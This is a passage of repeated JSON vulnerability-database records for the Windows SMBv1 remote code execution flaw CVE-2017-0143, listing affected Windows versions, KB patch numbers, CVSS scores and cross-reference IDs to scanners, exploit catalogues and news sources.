[{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, 
{"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", 
"msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", 
"msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T08:57:08", "differentElements": ["msAffectedSoftware"], "edition": 74}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-21T10:46:37", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KBMS16-110, 3187754", "KB4013198", "KB3210721", "KB4012214", "KB4012217", "KB4013429", "KB3213986", "KB4012212", "KB4012606", "KB4012216", "KB3210720", "KB3177186", "KB3205409", "KB3212646", "KB3205401", "KB4012598", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": 
"KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems 
Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-21T10:46:37", "differentElements": ["msAffectedSoftware"], "edition": 75}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": 
"bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-25T23:09:38", "history": [], "viewCount": 10, "enchantments": 
{"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", 
"SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-21T10:46:37", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-21T10:46:37", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB4012598", "KB4012215", "KB4012212", "KB4012214", "KB3205401", "KB4013198", "KBMS16-110, 3187754", "KB4012216", "KB3177186", "KB4012606", "KB3210721", "KB4012217", "KB3205409", "KB3210720", "KB4013429", "KB3212646", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": 
"Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
